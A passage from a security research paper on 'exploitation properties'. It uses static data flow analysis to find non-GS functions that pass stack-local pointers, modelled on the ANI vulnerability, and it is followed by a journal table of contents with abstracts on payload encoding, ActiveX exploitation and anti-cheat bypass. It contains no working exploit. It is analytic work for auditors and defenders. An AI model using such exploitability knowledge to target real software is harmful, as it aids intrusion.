the ANI vulnerability.
Using these test cases, the author used the features provided by the analysis
tool to determine the exploitation and vulnerability properties described in
the previous section and to identify the resulting subset of functions meeting
all criteria. This was accomplished by first attempting to identify the
subset of functions that do not contain GS within the scope of the target
binary. After identifying the subset of functions without GS, a second subset
was taken which consists of the functions that pass a pointer to a
stack-allocated local variable as a parameter to a child routine. This was
accomplished by using Phoenix's static single assignment (SSA) and alias
implementations to collect the requisite data flow information[12,25]. Using this
data flow information, it is possible to perform backwards data flow analysis
to determine the potential storage location of the parameter being passed at
each point along a given data flow path starting from the operand associated
with a parameter at a call site. The analysis terminates either when a fixed
point is reached or when it is determined that a pointer to a stack-allocated
variable could be passed as the parameter.
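A drastically simplified version of this backwards walk can be sketched over
a toy SSA-like definition list, where each variable is defined at most once
and each definition is either an address-of-stack operation, a copy, or
something opaque. This is an illustration of the idea only; Phoenix's actual
SSA and alias machinery is far more involved:

```c
#include <stddef.h>

/* Toy SSA-like definitions: each variable is defined at most once. */
enum def_op { OP_ADDR_OF_STACK, OP_COPY, OP_OTHER };

struct def {
    int         var;  /* variable being defined */
    enum def_op op;   /* how it is defined */
    int         src;  /* source variable for OP_COPY */
};

/* Walk backwards from 'var' along copy chains; return 1 if the value
 * traces to an address-of-stack operation, 0 otherwise. */
int traces_to_stack_ptr(const struct def *defs, size_t ndefs, int var)
{
    for (;;) {
        const struct def *d = NULL;
        size_t i;
        for (i = 0; i < ndefs; i++)
            if (defs[i].var == var) { d = &defs[i]; break; }
        if (d == NULL || d->op == OP_OTHER)
            return 0;               /* unknown or non-stack origin */
        if (d->op == OP_ADDR_OF_STACK)
            return 1;               /* reached &stack_local */
        var = d->src;               /* OP_COPY: follow the chain back */
    }
}
```

Applied at a call site, this kind of walk answers whether the operand passed
as a parameter could hold a pointer to a stack-allocated variable.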
While the previous section described the potential for using the partial
overwrite exploitation property to detect the function containing the ANI
vulnerability[6], it is not possible to create a meaningful parallel between the
test binary and that of the ANI vulnerability. This is due in part to the
fact that while it would certainly be possible to artificially place a useful
opcode at a specific location in the test binary, it would not add any value
beyond showing that it is possible to detect useful opcodes within the same
16-page aligned region as the caller of a given function. The author feels
that this point is somewhat moot given the fact that it has already been
proven that a partial overwrite can be used with the ANI vulnerability. The
only additional benefit that it could offer in this case would be to help
further constrain the resultant set size. However, without being able to run
this analysis against the vulnerable version of user32.dll, it is not possible
to draw meaningful conclusions at this point in time.
3.4) Results
The results of running the analysis tool against the test binary produced the
expected behavior. To illustrate this, it is helpful to consider a sampling
of the functions that were analyzed. The following functions have a form that
is similar to the ANI vulnerability. These functions also match the criteria
described in the previous subsection. Specifically, these functions do not
make use of GS and pass a pointer to a stack-allocated local variable (var) to
a child function:
int tc_df_pass_local_ptr_to_callee() {
  int var;
  tc_df_pass_local_ptr_to_callee_func(&var);
  return 0;
}

int tc_df_pass_local_ptr_to_callee_alias() {
  int var;
  int *p = &var;
  tc_df_pass_local_ptr_to_callee_func(p);
  return 0;
}

int tc_df_pass_local_ptr_to_callee_alias_struct(
    struct _foo *foo) {
  int var;
  foo->ptr = &var;
  return tc_df_pass_local_ptr_to_callee_func(
      foo->ptr);
}
Additionally, a handful of different test functions were also included in the
target binary in an effort to ensure that other scenarios were not improperly
detected as matching the criteria. Some examples of these functions include:
int tc_df_pass_local_to_callee_alias() {
  int var = 2;
  int p = var;
  tc_df_pass_local_to_callee_func(p);
  return 0;
}

int tc_df_pass_local_to_callee_deref() {
  int var = 2;
  int *p = &var;
  tc_df_pass_local_to_callee_func(*p);
  return 0;
}

int tc_df_pass_heap_ptr_to_callee(struct _foo *foo) {
  tc_df_pass_local_ptr_to_callee_func(&foo->val);
  return 0;
}
When running the analysis tool against the target binary, the following output
is shown:
>PhaseRunner.exe detectani.xml dfa.exe
Running phase: ANI Detection ... 1 target(s)
Displaying 3 normalizables at the
ProgramElement.Method granularity...
00001: dfa!tc_df_pass_local_ptr_to_callee_alias
00002: dfa!tc_df_pass_local_ptr_to_callee
00003: dfa!tc_df_pass_local_ptr_to_callee_alias_struct
While this unfortunately does not prove that these techniques could be used to
identify the function containing the ANI vulnerability, it does nevertheless
hint at the potential for detecting the function containing the ANI
vulnerability using its suggested exploitation and vulnerability properties.
As an aside, another interesting way in which this type of detection can be
accomplished is through the use of Language Integrated Queries (LINQ) which
are now supported in Visual Studio 2008[11]. For instance, a simple LINQ
expression for the above narrowing operation can be expressed as:
var matches =
    from Method method in engine.GetScopeMethods()
    where
        !method.IsGuardStackEnabled() &&
        method.IsPassingStackLocalPtrToChild()
    select method;

foreach (var method in matches)
    Console.WriteLine("{0} matches", method);
4) Potential Uses
Program analysis is one area that may benefit from the use of exploitation
properties. In particular, an auditor can make use of exploitation properties
to assist in the process of identifying regions of code that should be audited
more closely or with greater precedence. This determination can be made by
using exploitation properties to understand the ease of exploitation
associated with specific binaries or functions. By combining this information
with other data that is collected either manually or automatically, an auditor
can get a better understanding of the security aspects that are associated
with a system. This is beneficial both to an attacker and a defender. An
attacker can identify regions of code that would be easier to exploit and thus
devote more time to auditing those regions. Likewise, a defender can use this
information to the same extent but for different purposes. This type of
information is especially useful to a defender who needs to balance the cost
associated with performing security reviews because it should offer a better
understanding of what the business cost might be if a vulnerability is found
in a region of code. This cost can be derived from the negative publicity and
response effort needed to cope with a flaw that is found publicly in a region
of code that is widely exploited. For example, consider some of the Windows
flaws that have led to wormable issues and the cost they have had relative to
other issues.
Exploitation properties may also benefit the security community by helping to
identify ways in which future mitigations can be applied. This would involve
analyzing regions of code that could be more easily exploited in an effort to
determine what other forms of mitigations could help to protect these regions,
if any. This information could be fed back to the compiler to make it
possible for mitigations to be enabled that might otherwise be disabled by
default. For example, a function that by default would not have GS but is
subsequently found to be highly exploitable may benefit from having the
compiler insert GS.
5) Future Work
While this paper has defined exploitation properties and described a handful
of concrete examples, it has not attempted to formally define the correlation
between exploitation properties and the exploitation techniques they are
associated with. Future research will attempt to concretely define this
relationship as it should lead to a better understanding of the variables that
permit the use of various exploitation techniques. Using more formal
definitions of exploitation properties, a larger scale case study can be
completed which collects data about the effect of using exploitation
properties to improve program understanding for a variety of purposes. The
author views exploitation properties as being one component in a larger model.
This larger model could be used to join major areas of study within computer
security including attack surface analysis, vulnerability analysis, and
exploitation analysis to form a more complete understanding of the true risks
associated with a system.
6) Conclusion
This paper has introduced the general concept of exploitation properties and
described how they can be used to better understand the exploitability of a
system. The purpose of an exploitation property is to help convey the ease
with which a vulnerability might be exploited if one is found to be present.
Exploitation properties can be broken down into different categories based on
the configuration or context that a given property is associated with. These
categories include operating platforms, running processes, binary modules, and
functions.
Exploitation properties can be used to provide an alternative understanding of
an application's attack surface from the perspective of which areas would be
most trivially exploited. This can allow an attacker to focus on finding
security issues in code that would be more easily exploited. Likewise, a
defender can draw the same conclusions and direct resources of their own at
reviewing the associated code. It may also be possible to use this
information to augment existing mitigations or to come up with new
mitigations. A contrived example based on the form of the ANI vulnerability
was used to illustrate an automated approach to extracting exploitation
properties and using them to help identify a constrained subset of regions of
code that meet a specific criteria. Future research will attempt to better
define the extent of exploitation properties and their uses.
[1] Dowd, M., Metha, N., McDonald, J. Breaking C++ Applications.
https://www.blackhat.com/presentations/bh-usa-07/Dowd_McDonald_and_Mehta/Whitepaper/bh-usa-07-dowd_mcdonald_and_mehta.pdf
[2] Durden, Tyler. Bypassing PaX ASLR Protection. July, 2002.
http://www.phrack.org/issues.html?issue=59&id=9
[3] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!).
http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx
[4] Johnson, Richard. Windows Vista: Exploitation Countermeasures.
http://rjohnson.uninformed.org/
[5] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention
Mechanism of Microsoft Windows 2003 Server.
http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf
[6] Metasploit. Exploiting the ANI vulnerability on Vista.
http://blog.metasploit.com/2007/04/exploiting-ani-vulnerability-on-vista.html
[7] Microsoft Corporation. Microsoft Security Bulletin MS05-002. Jan, 2005.
http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
[8] Microsoft Corporation. /GS (Buffer Security Check).
http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx
[9] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers).
http://msdn2.microsoft.com/en-us/library/9a89h429.aspx
[10] Microsoft Corporation. A detailed description of the Data Execution
Prevention (DEP) feature. http://support.microsoft.com/kb/875352
[11] Microsoft Corporation. The LINQ Project.
http://msdn2.microsoft.com/en-us/netframework/aa904594.aspx
[12] Microsoft Corporation. Phoenix. http://research.microsoft.com/phoenix/
[13] Microsoft Corporation. Microsoft Portable Executable and Object File
Format Specification.
http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/pecoff_v8.doc
[14] Microsoft Corporation. Threat Modeling. June, 2003.
http://msdn2.microsoft.com/en-us/library/aa302419.aspx
[15] PaX Team. ASLR. http://pax.grsecurity.net/docs/aslr.txt
[16] Ren, Chris et al. Microsoft Compiler Flaw Technical Note.
http://www.cigital.com/news/index.php?pg=art&artid=70
[17] Rahbar, Ali. An analysis of Microsoft Windows Vista's ASLR. Oct, 2006.
http://www.sysdream.com/articles/Analysis-of-Microsoft-Windows-Vista's-ASLR.pdf
[18] skape, Skywing. Bypassing Windows Hardware-enforced DEP.
http://www.uninformed.org/?v=2&a=4&t=sumry
[19] skape. Preventing the Exploitation of SEH Overwrites.
http://www.uninformed.org/?v=5&a=2&t=sumry
[20] skape. Reducing the Effective Entropy of GS Cookies.
http://www.uninformed.org/?v=7&a=2&t=sumry
[21] Skywing. Vista ASLR is not on by default for image base addresses.
http://www.nynaeve.net/?p=100
[22] Sotirov, Alexander. Windows Animated Cursor Stack Overflow
Vulnerability. March, 2007.
http://www.determina.com/security.research/vulnerabilities/ani-header.html
[23] Wikipedia. Stack-smashing protection.
http://en.wikipedia.org/wiki/Stack-smashing_protection
[24] Wikipedia. Address space layout randomization.
http://en.wikipedia.org/wiki/ASLR
[25] Wikipedia. Static single assignment form.
http://en.wikipedia.org/wiki/Static_single_assignment_form
[26] University of Wisconsin. Wisconsin Program-Slicing Project's Home Page.
http://www.cs.wisc.edu/wpis/html/
[27] Whitehouse, Ollie. Analysis of GS protections in Microsoft Windows
Vista. http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf

uninformed/9.txt
Engineering in Reverse
An Objective Analysis of the Lockdown Protection System for Battle.net
Skywing
Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.
html | pdf | txt
Exploitation Technology
ActiveX - Active Exploitation
warlord
This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.
html | pdf | txt
Context-keyed Payload Encoding
I)ruid
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.
html | pdf | txt
Improving Software Security Analysis using Exploitation Properties
skape
Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.
html | pdf | txt
